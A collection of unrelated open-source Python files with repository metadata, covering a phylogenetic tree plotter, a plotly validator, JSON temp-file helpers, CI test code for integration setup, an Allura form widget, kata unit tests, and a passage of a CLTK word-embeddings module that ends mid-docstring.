        "--geoscale",
        default=False,
        action="store_true",
        help="Plot geological scale",
    )
    group.add_option(
        "--wgdinfo", help="CSV specifying the position and style of WGD events"
    )
    group.add_option(
        "--groups",
        help="Group names from top to bottom, to the right of the tree. "
        "Each distinct color in --leafinfo is considered part of the same group. "
        "Separate the names with comma, such as 'eudicots,,monocots,'. "
        "Empty names will be ignored for that specific group. ",
    )
    opts, args, iopts = p.set_image_options(args, figsize="10x7")
    if len(args) != 1:
        sys.exit(not p.print_help())
    (datafile,) = args
    outgroup = None
    reroot = not opts.noreroot
    if opts.outgroup:
        outgroup = opts.outgroup.split(",")
    hpd = None
    # "demo" renders a small built-in rice/sorghum tree instead of a file.
    if datafile == "demo":
        t = Tree(
            """(((Os02g0681100:0.1151,Sb04g031800:0.11220)1.0:0.0537,
            (Os04g0578800:0.04318,Sb06g026210:0.04798)-1.0:0.08870)1.0:0.06985,
            ((Os03g0124100:0.08845,Sb01g048930:0.09055)1.0:0.05332,
            (Os10g0534700:0.06592,Sb01g030630:0.04824)-1.0:0.07886):0.09389);"""
        )
    else:
        logging.debug("Load tree file `{0}`".format(datafile))
        t, hpd = parse_tree(datafile)
    # Output image is named after the input file, with the image extension.
    pf = datafile.rsplit(".", 1)[0]
    fig = plt.figure(1, (iopts.w, iopts.h))
    root = fig.add_axes([0, 0, 1, 1])
    supportcolor = "k" if opts.support else None
    margin, rmargin = 0.1, opts.rmargin  # Left and right margin
    leafinfo = LeafInfoFile(opts.leafinfo).cache if opts.leafinfo else None
    wgdinfo = WGDInfoFile(opts.wgdinfo).cache if opts.wgdinfo else None
    draw_tree(
        root,
        t,
        hpd=hpd,
        margin=margin,
        rmargin=rmargin,
        ymargin=margin,
        supportcolor=supportcolor,
        internal=opts.internal,
        outgroup=outgroup,
        dashedoutgroup=opts.dashedoutgroup,
        reroot=reroot,
        gffdir=opts.gffdir,
        sizes=opts.sizes,
        SH=opts.SH,
        scutoff=opts.scutoff,
        leafcolor=opts.leafcolor,
        leaffont=opts.leaffont,
        leafinfo=leafinfo,
        wgdinfo=wgdinfo,
        geoscale=opts.geoscale,
        groups=opts.groups.split(",") if opts.groups else [],
    )
    normalize_axes(root)
    image_name = pf + "." + iopts.format
    savefig(image_name, dpi=iopts.dpi, iopts=iopts)
if __name__ == "__main__":
main(sys.argv[1:])
|
{
"content_hash": "0436c1ec770bae5e55136d753f95e4ef",
"timestamp": "",
"source": "github",
"line_count": 683,
"max_line_length": 88,
"avg_line_length": 29.765739385065885,
"alnum_prop": 0.5105755041810133,
"repo_name": "tanghaibao/jcvi",
"id": "dbb5164e3df51877465666b123ee259867802dec",
"size": "20377",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "jcvi/graphics/tree.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Cython",
"bytes": "10467"
},
{
"name": "Dockerfile",
"bytes": "1150"
},
{
"name": "Makefile",
"bytes": "445"
},
{
"name": "Python",
"bytes": "2635155"
}
],
"symlink_target": ""
}
|
import _plotly_utils.basevalidators
class OutlinecolorValidator(_plotly_utils.basevalidators.ColorValidator):
    """Color validator for the layout.mapbox.layer.fill.outlinecolor
    property."""

    def __init__(
        self,
        plotly_name="outlinecolor",
        parent_name="layout.mapbox.layer.fill",
        **kwargs,
    ):
        # The edit type defaults to "plot" unless the caller overrides it.
        edit_type = kwargs.pop("edit_type", "plot")
        super(OutlinecolorValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=edit_type,
            **kwargs,
        )
|
{
"content_hash": "68e55243eed56730d95cc33aeaf0187e",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 73,
"avg_line_length": 29.1875,
"alnum_prop": 0.588865096359743,
"repo_name": "plotly/plotly.py",
"id": "2e5e9d29c7b8e581e2c17a4b3e3b1112921dfcab",
"size": "467",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/layout/mapbox/layer/fill/_outlinecolor.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "545"
},
{
"name": "JavaScript",
"bytes": "2074"
},
{
"name": "PostScript",
"bytes": "565328"
},
{
"name": "Python",
"bytes": "31506317"
},
{
"name": "TypeScript",
"bytes": "71337"
}
],
"symlink_target": ""
}
|
import os, tempfile
import json
def write_command(output_directory=None,
                  command_name=None,
                  target_device=None,
                  command_id=None,
                  directory=None):
    """Serialize the non-None command parameters to a temporary JSON file.

    Returns the path of the created file; the caller is responsible for
    deleting it.
    """
    command = {}
    def __write(key, parameter):
        nonlocal command
        if parameter is not None:
            command[key] = parameter
    __write('outputDirectory', output_directory)
    __write('commandName', command_name)
    __write('targetDevice', target_device)
    __write('commandID', command_id)
    # FIX: mkstemp returns an *open* OS-level fd plus the path; the original
    # discarded the fd, leaking it.  Wrap it so it is closed after writing.
    fd, path = tempfile.mkstemp(dir=directory)
    with os.fdopen(fd, 'w') as f:
        json.dump(command, f, ensure_ascii=False)
    return path
def write_device_config(operating_system=None,
                        device_id=None,
                        data_source=None,
                        computer_name=None):
    """Serialize the non-None device attributes to a temporary JSON file.

    Each attribute is wrapped in the weighted-value structure the consumer
    expects: {"value": [attribute], "weight": 1}.  Returns the file path;
    the caller is responsible for deleting it.
    """
    config = {}
    def __write(key, attribute):
        nonlocal config
        if attribute is not None:
            config[key] = [{"value": [attribute],
                            "weight": 1}]
    __write('operating system', operating_system)
    __write('device id', device_id)
    __write('data source', data_source)
    __write('computer name', computer_name)
    # FIX: close the OS-level fd returned by mkstemp (it leaked before).
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, 'w') as f:
        json.dump(config, f, ensure_ascii=False)
    return path
def write_result_config(locate=None,
                        default=None,
                        refresh=None):
    """Serialize the non-None result commands to a temporary JSON file.

    Each command is wrapped in the weighted-value structure the consumer
    expects: {"value": [command], "weight": 1}.  Returns the file path;
    the caller is responsible for deleting it.
    """
    config = {}
    def __write(key, command):
        nonlocal config
        if command is not None:
            config[key] = [{"value": [command],
                            "weight": 1}]
    __write('locate', locate)
    __write('default', default)
    __write('refresh', refresh)
    # FIX: close the OS-level fd returned by mkstemp (it leaked before).
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, 'w') as f:
        json.dump(config, f, ensure_ascii=False)
    return path
|
{
"content_hash": "65bad2464703fca915082964d264e624",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 47,
"avg_line_length": 27.857142857142858,
"alnum_prop": 0.5754985754985755,
"repo_name": "bigfix/trask",
"id": "676883fcaca3c2bdf42ea417df2a4134b186d280",
"size": "1774",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/util.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "27433"
},
{
"name": "Shell",
"bytes": "329"
}
],
"symlink_target": ""
}
|
import pytest
from unittest.mock import mock_open
from Tests.configure_and_test_integration_instances import XSOARBuild, create_build_object, \
options_handler, XSIAMBuild, get_turned_non_hidden_packs, update_integration_lists, \
get_packs_with_higher_min_version, filter_new_to_marketplace_packs
# Fixture: fake XSIAM server configuration entries keyed by machine name,
# mirroring the structure of the real xsiam_servers.json (all credentials
# here are dummies).
XSIAM_SERVERS = {
    "qa2-test-111111": {
        "ui_url": "https://xsiam1.paloaltonetworks.com/",
        "instance_name": "qa2-test-111111",
        "api_key": "1234567890",
        "x-xdr-auth-id": 1,
        "base_url": "https://api1.paloaltonetworks.com/",
        "xsiam_version": "3.2.0",
        "demisto_version": "99.99.98"
    },
    "qa2-test-222222": {
        "ui_url": "https://xsoar-content-2.xdr-qa2-uat.us.paloaltonetworks.com/",
        "instance_name": "qa2-test-222222",
        "api_key": "1234567890",
        "x-xdr-auth-id": 1,
        "base_url": "https://api-xsoar-content-2.xdr-qa2-uat.us.paloaltonetworks.com",
        "xsiam_version": "3.2.0",
        "demisto_version": "99.99.98"
    }
}
def create_build_object_with_mock(mocker, build_object_type):
    """Create a Build object of the requested type ('XSOAR' or 'XSIAM') with
    CLI arguments faked and all file/server lookups mocked out, so that no
    real CI environment is needed."""
    args = ['-u', "$USERNAME", '-p', "$PASSWORD", '-c', "$CONF_PATH", '-s', "$SECRET_CONF_PATH",
            '--tests_to_run', "$ARTIFACTS_FOLDER/filter_file.txt",
            '--pack_ids_to_install', "$ARTIFACTS_FOLDER/content_packs_to_install.txt",
            '-g', "$GIT_SHA1", '--ami_env', "$1", '-n', 'false', '--branch', "$CI_COMMIT_BRANCH",
            '--build-number', "$CI_PIPELINE_ID", '-sa', "$GCS_MARKET_KEY", '--build_object_type', build_object_type,
            '--xsiam_machine', "qa2-test-111111", '--xsiam_servers_path', '$XSIAM_SERVERS_PATH']
    options = options_handler(args=args)
    # Minimal conf JSON plus the fake XSIAM server entries.
    json_data = {
        'tests': [],
        'skipped_integrations': [],
        'unmockable_integrations': [],
    }
    json_data.update(**XSIAM_SERVERS)
    mocker.patch('Tests.configure_and_test_integration_instances.get_json_file',
                 return_value=json_data)
    mocker.patch('Tests.configure_and_test_integration_instances.Build.fetch_tests_list',
                 return_value=[])
    mocker.patch('Tests.configure_and_test_integration_instances.Build.fetch_pack_ids_to_install',
                 return_value=[])
    mocker.patch('Tests.configure_and_test_integration_instances.options_handler',
                 return_value=options)
    mocker.patch('Tests.configure_and_test_integration_instances.XSOARBuild.get_servers',
                 return_value=({'1.1.1.1': '7000'}, '6.5.0'))
    build = create_build_object()
    return build
def test_configure_old_and_new_integrations(mocker):
    """
    Given:
        - A list of new integrations that should be configured
        - A list of old integrations that should be configured
    When:
        - Running 'configure_old_and_new_integrations' method on those integrations
    Then:
        - Assert that the configured old integrations have no intersection with the configured new integrations
    """
    def configure_integration_instance_mocker(integration,
                                              _,
                                              __):
        # Identity stand-in: return the integration unchanged so the test
        # can inspect exactly which ones were "configured".
        return integration
    mocker.patch('Tests.configure_and_test_integration_instances.XSOARBuild.__init__',
                 return_value=None)
    mocker.patch('Tests.configure_and_test_integration_instances.configure_integration_instance',
                 side_effect=configure_integration_instance_mocker)
    build = XSOARBuild({})
    build.servers = ['server1']
    old_modules_instances, new_modules_instances = build.configure_modified_and_new_integrations(
        modified_integrations_to_configure=['old_integration1', 'old_integration2'],
        new_integrations_to_configure=['new_integration1', 'new_integration2'],
        demisto_client_=None,
    )
    assert not set(old_modules_instances).intersection(new_modules_instances)
@pytest.mark.parametrize('expected_class, build_object_type', [(XSOARBuild, 'XSOAR'), (XSIAMBuild, 'XSIAM')])
def test_create_build(mocker, expected_class, build_object_type):
    """
    Given:
        - server_type of the server we run the build on: XSIAM or XSOAR.
    When:
        - Running 'configure_an_test_integration_instances' script and creating Build object
    Then:
        - Assert that the right Build object was created: XSIAMBuild or XSOARBuild.
    """
    build = create_build_object_with_mock(mocker, build_object_type)
    assert isinstance(build, expected_class)
NON_HIDDEN_PACKS = [
("""
"tags": [],
+ "hidden": false,
"marketplaces": [
"xsoar",
"marketplacev2""", True),
("""
"tags": [],
+ "hidden": true,
"marketplaces": [
"xsoar",
"marketplacev2""", False),
("""
"tags": [],
"marketplaces": [
"xsoar",
"marketplacev2""", False),
("""
"tags": [],
+ "hidden": true,
- "hidden": false,
"marketplaces": [
"xsoar",
"marketplacev2""", False)
]
@pytest.mark.parametrize('diff, the_expected_result', NON_HIDDEN_PACKS)
def test_get_turned_non_hidden_packs(mocker, diff, the_expected_result):
    """
    Given:
        - A pack_metadata.json diff as returned from git.
    When:
        - Running the 'get_turned_non_hidden_packs' method.
    Then:
        - Assert the pack is reported as turned non-hidden only when expected.
    """
    xsoar_build = create_build_object_with_mock(mocker, 'XSOAR')
    mocker.patch('Tests.configure_and_test_integration_instances.run_git_diff', return_value=diff)
    non_hidden = get_turned_non_hidden_packs({'test'}, xsoar_build)
    assert the_expected_result == ('test' in non_hidden)
# Cases for test_update_integration_lists: each tuple is
# (new integration names, turned non-hidden pack ids, modified integration
# names, predicate(new, modified) that must hold after the update).
UPDATE_INTEGRATION_LISTS = [
    (['test1'], ['test2'], ['test2'], lambda new, modified: 'test2' in new and not modified),
    (['test1'], ['test1'], ['test2'], lambda new, modified: 'test2' not in new and 'test2' in modified),
    (['test1'], [], ['test2'], lambda new, modified: 'test2' not in new and 'test2' in modified),
    (['test1'], ['test1'], ['test1'], lambda new, modified: len(new) == 1 and not modified)
]
@pytest.mark.parametrize(
    'new_integrations_names, turned_non_hidden_packs_id, modified_integrations_names, the_expected_result',
    UPDATE_INTEGRATION_LISTS)
def test_update_integration_lists(mocker, new_integrations_names, turned_non_hidden_packs_id,
                                  modified_integrations_names, the_expected_result):
    """
    Given:
        - New integration names, modified integration names and turned non-hidden pack ids.
    When:
        - Running the 'update_integration_lists' method.
    Then:
        - Assert the turned non-hidden integrations were removed from the modified
          integrations list and added to the new integrations list.
    """
    mocker.patch('Tests.configure_and_test_integration_instances.packs_names_to_integrations_names',
                 return_value=turned_non_hidden_packs_id)
    new_list, modified_list, *_ = update_integration_lists(
        new_integrations_names, turned_non_hidden_packs_id, modified_integrations_names)
    assert the_expected_result(new_list, modified_list)
def test_get_packs_with_higher_min_version(mocker):
    """
    Given:
        - Pack names to install.
    When:
        - Running the 'get_packs_with_higher_min_version' method.
    Then:
        - Assert only packs whose serverMinVersion exceeds the server version are returned.
    """
    # Pack metadata declares 6.6.0 while the server runs 6.5.0.
    mocker.patch("builtins.open", mock_open(read_data='{"serverMinVersion": "6.6.0"}'))
    higher_min_version = get_packs_with_higher_min_version({'TestPack'}, 'content', '6.5.0')
    assert higher_min_version == {'TestPack'}
CHANGED_MARKETPLACE_PACKS = [
("""
"dependencies": {},
"marketplaces": [
- "xsoar"
+ "xsoar",
+ "marketplacev2"
]
}""", 'XSOAR', set()),
("""
"dependencies": {},
"marketplaces": [
- "xsoar"
+ "xsoar",
+ "marketplacev2"
]
}""", 'XSIAM', {'pack_name'}),
("""
"dependencies": {},
"marketplaces": [
- "marketplacev2"
+ "marketplacev2",
+ "xsoar"
]
}""", 'XSOAR', {'pack_name'}),
]
@pytest.mark.parametrize('diff, build_type, the_expected_result', CHANGED_MARKETPLACE_PACKS)
def test_first_added_to_marketplace(mocker, diff, build_type, the_expected_result):
    """
    Given:
        - A pack_metadata.json diff as returned from git.
    When:
        - Running the 'filter_new_to_marketplace_packs' method.
    Then:
        - Assert only packs newly added to the current build's marketplace are returned.
    """
    current_build = create_build_object_with_mock(mocker, build_type)
    mocker.patch('Tests.configure_and_test_integration_instances.run_git_diff', return_value=diff)
    assert the_expected_result == filter_new_to_marketplace_packs(current_build, {'pack_name'})
|
{
"content_hash": "70fef803d1c9e49f90953fc0b3bc2474",
"timestamp": "",
"source": "github",
"line_count": 232,
"max_line_length": 128,
"avg_line_length": 38.077586206896555,
"alnum_prop": 0.6281412723568033,
"repo_name": "demisto/content",
"id": "c1390a3183e48bf217806e97a63e623b39d8822b",
"size": "8834",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Tests/tests/configure_and_test_integration_instances_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "2146"
},
{
"name": "HTML",
"bytes": "205901"
},
{
"name": "JavaScript",
"bytes": "1584075"
},
{
"name": "PowerShell",
"bytes": "442288"
},
{
"name": "Python",
"bytes": "47881712"
},
{
"name": "Rich Text Format",
"bytes": "480911"
},
{
"name": "Shell",
"bytes": "108066"
},
{
"name": "YARA",
"bytes": "1185"
}
],
"symlink_target": ""
}
|
import ew
from ew import jinja2_ew
from allura.lib import validators as v
from forgetracker import model
class BinForm(ew.SimpleForm):
    # Form widget for creating/editing a tracker "bin" (a saved search).
    template = 'jinja:forgetracker:templates/tracker_widgets/bin_form.html'
    defaults = dict(
        ew.SimpleForm.defaults,
        submit_text="Save Bin")
    class hidden_fields(ew.NameList):
        # The Bin being edited; ``None`` when creating a new one.
        _id = jinja2_ew.HiddenField(
            validator=v.Ming(model.Bin), if_missing=None)
    class fields(ew.NameList):
        # Display name of the saved search; required.
        summary = jinja2_ew.TextField(
            label='Bin Name',
            validator=v.UnicodeString(not_empty=True))
        # Query string executed when the bin is viewed; required.
        terms = jinja2_ew.TextField(
            label='Search Terms',
            validator=v.UnicodeString(not_empty=True))
|
{
"content_hash": "b634645aeb5fb6f9bb26d5512cd97ca8",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 75,
"avg_line_length": 29.791666666666668,
"alnum_prop": 0.6531468531468532,
"repo_name": "apache/allura",
"id": "7040ff39202c43d2ca099515f9c06048196837cb",
"size": "1585",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "ForgeTracker/forgetracker/widgets/bin_form.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "6142"
},
{
"name": "CSS",
"bytes": "181457"
},
{
"name": "Dockerfile",
"bytes": "4748"
},
{
"name": "HTML",
"bytes": "867332"
},
{
"name": "JavaScript",
"bytes": "1191836"
},
{
"name": "Makefile",
"bytes": "6248"
},
{
"name": "Python",
"bytes": "4499987"
},
{
"name": "RAML",
"bytes": "27600"
},
{
"name": "Roff",
"bytes": "41"
},
{
"name": "Ruby",
"bytes": "1280"
},
{
"name": "SCSS",
"bytes": "27742"
},
{
"name": "Shell",
"bytes": "131207"
},
{
"name": "XSLT",
"bytes": "3357"
}
],
"symlink_target": ""
}
|
import unittest
from katas.beta.knight_or_knave import knight_or_knave
class KnightOrKnaveTestCase(unittest.TestCase):
    """Exercise ``knight_or_knave`` with booleans, boolean expressions,
    and strings containing Python expressions. Per these cases, truthy
    input yields 'Knight!' and falsy input 'Knave! Do not trust.'.
    """
    def test_equal_1(self):
        self.assertEqual(knight_or_knave(True), 'Knight!')
    def test_equal_2(self):
        self.assertEqual(knight_or_knave(False), 'Knave! Do not trust.')
    def test_equal_3(self):
        self.assertEqual(knight_or_knave('4+2==5'), 'Knave! Do not trust.')
    def test_equal_4(self):
        self.assertEqual(knight_or_knave('2+2==4'), 'Knight!')
    def test_equal_5(self):
        self.assertEqual(knight_or_knave(True and False),
                         'Knave! Do not trust.')
    def test_equal_6(self):
        self.assertEqual(knight_or_knave(True or False), 'Knight!')
    def test_equal_7(self):
        self.assertEqual(knight_or_knave(not False), 'Knight!')
    def test_equal_8(self):
        self.assertEqual(knight_or_knave(
            'not True and False or False or False'
        ), 'Knave! Do not trust.')
    def test_equal_9(self):
        self.assertEqual(knight_or_knave('3 is 3'), 'Knight!')
    def test_equal_10(self):
        self.assertEqual(knight_or_knave(not False), 'Knight!')
    def test_equal_11(self):
        self.assertEqual(knight_or_knave('True'), 'Knight!')
    def test_equal_12(self):
        self.assertEqual(knight_or_knave('not True'), 'Knave! Do not trust.')
    def test_equal_13(self):
        self.assertEqual(knight_or_knave('True'), 'Knight!')
    def test_equal_14(self):
        self.assertEqual(knight_or_knave(False), 'Knave! Do not trust.')
    def test_equal_15(self):
        self.assertEqual(knight_or_knave('2+2==5'), 'Knave! Do not trust.')
    def test_equal_16(self):
        self.assertEqual(knight_or_knave('4+1==5'), 'Knight!')
    def test_equal_17(self):
        self.assertEqual(knight_or_knave(True and False),
                         'Knave! Do not trust.')
    def test_equal_18(self):
        self.assertEqual(knight_or_knave(True or False), 'Knight!')
    def test_equal_19(self):
        self.assertEqual(knight_or_knave(not False), 'Knight!')
    def test_equal_20(self):
        self.assertEqual(knight_or_knave(
            not False and True or False or True
        ), 'Knight!')
    def test_equal_21(self):
        self.assertEqual(knight_or_knave('4 is 3'), 'Knave! Do not trust.')
    def test_equal_22(self):
        self.assertEqual(knight_or_knave(not False), 'Knight!')
    def test_equal_23(self):
        self.assertEqual(knight_or_knave('True'), 'Knight!')
    def test_equal_24(self):
        self.assertEqual(knight_or_knave('not True'), 'Knave! Do not trust.')
    def test_equal_25(self):
        self.assertEqual(knight_or_knave(False or False or False and False),
                         'Knave! Do not trust.')
    def test_equal_26(self):
        self.assertEqual(knight_or_knave(False), 'Knave! Do not trust.')
    def test_equal_27(self):
        self.assertEqual(knight_or_knave('9+2==3'), 'Knave! Do not trust.')
    def test_equal_28(self):
        self.assertEqual(knight_or_knave('105+30076==30181'), 'Knight!')
    def test_equal_29(self):
        self.assertEqual(knight_or_knave(True and False),
                         'Knave! Do not trust.')
    def test_equal_30(self):
        self.assertEqual(knight_or_knave(True or False), 'Knight!')
    def test_equal_31(self):
        self.assertEqual(knight_or_knave(not False), 'Knight!')
    def test_equal_32(self):
        self.assertEqual(knight_or_knave(
            'not True and False or False or False'
        ), 'Knave! Do not trust.')
    def test_equal_33(self):
        self.assertEqual(knight_or_knave('3 is 3 is 3 is 9'),
                         'Knave! Do not trust.')
    def test_equal_34(self):
        self.assertEqual(knight_or_knave(not False), 'Knight!')
    def test_equal_35(self):
        self.assertEqual(knight_or_knave('True'), 'Knight!')
    def test_equal_36(self):
        self.assertEqual(knight_or_knave('not True'), 'Knave! Do not trust.')
    def test_equal_37(self):
        self.assertEqual(knight_or_knave('True'), 'Knight!')
    def test_equal_38(self):
        self.assertEqual(knight_or_knave('False'), 'Knave! Do not trust.')
    def test_equal_39(self):
        self.assertEqual(knight_or_knave('2+2==5'), 'Knave! Do not trust.')
    def test_equal_40(self):
        self.assertEqual(knight_or_knave('4+1==5'), 'Knight!')
    def test_equal_41(self):
        self.assertEqual(knight_or_knave(True and False),
                         'Knave! Do not trust.')
    def test_equal_42(self):
        self.assertEqual(knight_or_knave(not False and not False), 'Knight!')
    def test_equal_43(self):
        self.assertEqual(knight_or_knave('"orange" is not "red"'), 'Knight!')
    def test_equal_44(self):
        self.assertEqual(knight_or_knave(
            not False and True or False or True
        ), 'Knight!')
    def test_equal_45(self):
        self.assertEqual(knight_or_knave('4 is "blue"'),
                         'Knave! Do not trust.')
    def test_equal_46(self):
        self.assertEqual(knight_or_knave(not False), 'Knight!')
    def test_equal_47(self):
        self.assertEqual(knight_or_knave('True is not False'), 'Knight!')
    def test_equal_48(self):
        self.assertEqual(knight_or_knave('not True'), 'Knave! Do not trust.')
|
{
"content_hash": "d87960600e451773da41127d2fd3c7e3",
"timestamp": "",
"source": "github",
"line_count": 164,
"max_line_length": 77,
"avg_line_length": 32.68292682926829,
"alnum_prop": 0.6048507462686568,
"repo_name": "the-zebulan/CodeWars",
"id": "d3a60005e47b38ba9b69035d698cf12b709684e3",
"size": "5360",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/beta_tests/test_knight_or_knave.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1203000"
}
],
"symlink_target": ""
}
|
"""Module for accessing pre-trained `fastText word embeddings
<https://fasttext.cc/>`_ and `Word2Vec embeddings from NLPL
<http://vectors.nlpl.eu/repository/>`_. Two sets of models are available
from fastText, one being trained only on corpora taken from
Wikipedia (`249 languages
<https://fasttext.cc/docs/en/pretrained-vectors.html>`_) and
the other being a combination of Wikipedia and Common Crawl
(`157 languages, a subset of the former
<https://fasttext.cc/docs/en/crawl-vectors.html>`_).
The Word2Vec models are in two versions, ``txt`` and ``bin``, with the
``txt`` being approximately twice the size and containing information
for retraining.
Note: In Oct 2022, we changed from the ``fasttext`` library to Spacy's ``floret``,
which contains ``fasttext``'s source but without its packaging problems.
# TODO: Classes ``Word2VecEmbeddings`` and ``FastTextEmbeddings`` contain duplicative code. Consider combining them.
# TODO: Instead of returning `None`, return an empty numpy array of correct len.
"""
import os
from typing import List
from zipfile import ZipFile
from gensim import models # type: ignore
from cltk.core.exceptions import CLTKException, UnimplementedAlgorithmError
from cltk.data.fetch import FetchCorpus
from cltk.languages.utils import get_lang
from cltk.utils import CLTK_DATA_DIR, get_file_with_progress_bar, query_yes_no
from cltk.utils.file_operations import make_cltk_path
# Languages whose Word2Vec models the CLTK self-hosts (see
# ``CLTKWord2VecEmbeddings``).
MAP_CLTK_SELF_HOSTED_LANGS = dict(enm="enm")  # Middle English
# NLPL repository download URLs for Word2Vec models, keyed by ISO code.
MAP_NLPL_LANG_TO_URL = dict(
    arb="http://vectors.nlpl.eu/repository/20/31.zip",  # Arabic
    chu="http://vectors.nlpl.eu/repository/20/60.zip",  # Old Church Slavonic
    grc="http://vectors.nlpl.eu/repository/20/30.zip",  # Ancient Greek
    lat="http://vectors.nlpl.eu/repository/20/56.zip",  # Latin
)
# Map of CLTK ISO codes to fastText's own language codes.
MAP_LANGS_CLTK_FASTTEXT = {
    "ang": "ang",  # Anglo-Saxon
    "arb": "ar",  # Arabic
    "arc": "arc",  # Aramaic
    "got": "got",  # Gothic
    "lat": "la",  # Latin
    "pli": "pi",  # Pali
    "san": "sa",  # Sanskrit
}
class CLTKWord2VecEmbeddings:
    """Wrapper for Word2Vec embeddings self-hosted by the CLTK
    (languages in ``MAP_CLTK_SELF_HOSTED_LANGS``).
    """

    def __init__(
        self,
        iso_code: str,
        model_type: str = "txt",
        interactive: bool = True,
        silent: bool = False,
        overwrite: bool = False,
    ):
        """Validate the parameters, download the model if necessary,
        then load it into memory.

        :param iso_code: ISO code of the language; must appear in
            ``MAP_CLTK_SELF_HOSTED_LANGS``.
        :param model_type: ``"txt"`` or ``"bin"``.
        :param interactive: Prompt the user before downloading.
        :param silent: Suppress console messages; incompatible with
            ``interactive``.
        :param overwrite: Re-download the model even if already present.
        :raises ValueError: If ``interactive`` and ``silent`` are both
            True, or ``model_type`` is invalid.
        :raises UnimplementedAlgorithmError: If no self-hosted model
            exists for ``iso_code``.
        """
        self.iso_code = iso_code
        self.model_type = model_type
        self.interactive = interactive
        self.silent = silent
        self.overwrite = overwrite
        if self.interactive and self.silent:
            raise ValueError(
                "``interactive`` and ``silent`` options are not compatible with each other."
            )
        self._check_input_params()
        # NOTE(review): ``model_path`` uses "model" while ``_build_filepath``
        # uses "models" — only the basename of ``fp_model`` is used by
        # ``_load_model``, so the discrepancy is currently latent; confirm intent.
        self.model_path = make_cltk_path(
            self.iso_code, "model", f"{self.iso_code}_models_cltk", "semantics"
        )
        # load model after all checks OK
        self.fp_model = self._build_filepath()
        if not self._is_model_present() or self.overwrite:
            self._download_cltk_self_hosted_models()
        # else: model already present and ``overwrite=False``; nothing to do.
        # TODO: Log a message in that case.
        self.model: models.word2vec.Word2Vec = self._load_model()

    def _build_filepath(self):
        """Create filepath where chosen language should be found."""
        model_dir = os.path.join(
            self.iso_code, "models", f"{self.iso_code}_models_cltk", "semantics"
        )  # type: str
        return os.path.join(model_dir, f"me_word_embeddings_model.{self.model_type}")

    def get_word_vector(self, word: str):
        """Return the embedding array for ``word``, or ``None`` if the
        word is not in the vocabulary."""
        try:
            return self.model.wv.get_vector(word)
        except KeyError:
            return None

    def get_embedding_length(self) -> int:
        """Return the embedding length for the loaded model."""
        return self.model.vector_size

    def get_sims(self, word: str):
        """Return the words most similar to ``word``."""
        return self.model.wv.most_similar(word)

    def _check_input_params(self) -> None:
        """Confirm that input parameters are valid and in a
        valid configuration.
        """
        # 1. check if lang valid
        get_lang(self.iso_code)  # check if iso_code valid
        # 2. check if any self-hosted embeddings for this lang
        if self.iso_code not in MAP_CLTK_SELF_HOSTED_LANGS:
            available_embeddings_str = "', '".join(MAP_CLTK_SELF_HOSTED_LANGS.keys())
            raise UnimplementedAlgorithmError(
                f"No embedding available for language '{self.iso_code}'."
                f" Self-hosted Word2Vec models available for: '{available_embeddings_str}'."
            )
        # 3. assert that model type is valid
        valid_types = ["bin", "txt"]
        if self.model_type not in valid_types:
            unavailable_types_str = "', '".join(valid_types)
            raise ValueError(
                f"Invalid ``model_type`` {self.model_type}. Valid model types: {unavailable_types_str}."
            )

    def _download_cltk_self_hosted_models(self) -> None:
        """Perform complete download of Word2Vec models and save
        them in the appropriate ``cltk_data`` dir.

        :raises CLTKException: If the user declines the download.
        """
        if not self.interactive:
            if not self.silent:
                print(
                    "CLTK message: Going to download the model ..."
                )  # pragma: no cover
            # NOTE(review): this branch downloads ``{iso}_cltk_models`` while
            # the interactive branch (and ``model_path``) use
            # ``{iso}_models_cltk`` — confirm which repo name is correct.
            fetch_corpus = FetchCorpus(language=self.iso_code)
            fetch_corpus.import_corpus(
                corpus_name=f"{self.iso_code}_cltk_models", branch="main"
            )
        else:
            print(  # pragma: no cover
                "CLTK message: This part of the CLTK depends upon word embedding models from the NLPL project."
            )  # pragma: no cover
            dl_is_allowed = query_yes_no(
                f"Do you want to download the {self.iso_code} models to {self.model_path}'?"
            )  # type: bool
            if dl_is_allowed:
                fetch_corpus = FetchCorpus(language=self.iso_code)
                fetch_corpus.import_corpus(
                    corpus_name=f"{self.iso_code}_models_cltk", branch="main"
                )
            else:
                raise CLTKException("Impossible to download the model.")

    def _is_model_present(self) -> bool:
        """Return whether the model directory exists on disk."""
        return os.path.isdir(self.model_path)

    def _load_model(self) -> models.word2vec.Word2Vec:
        """Load the Word2Vec model into memory.

        :raises UnicodeDecodeError: If Gensim cannot decode the model file.
        """
        try:
            return models.word2vec.Word2Vec.load(
                os.path.join(self.model_path, os.path.basename(self.fp_model)))
        except UnicodeDecodeError:
            msg = f"Cannot open file '{self.fp_model}' with Gensim 'load_word2vec_format'."
            print(msg)
            # Re-raise the caught exception. ``raise UnicodeDecodeError`` (the
            # bare class) would itself crash with TypeError, because the
            # constructor requires five arguments.
            raise
class Word2VecEmbeddings:
    """Wrapper for Word2Vec embeddings downloaded from the NLPL
    repository. Note: For models provided by fastText, use class
    ``FastTextEmbeddings``.
    """

    def __init__(
        self,
        iso_code: str,
        model_type: str = "txt",
        interactive: bool = True,
        silent: bool = False,
        overwrite: bool = False,
    ):
        """Constructor for ``Word2VecEmbeddings`` class.

        :param iso_code: ISO code of the language; must appear in
            ``MAP_NLPL_LANG_TO_URL``.
        :param model_type: ``"txt"`` or ``"bin"``.
        :param interactive: Prompt the user before downloading.
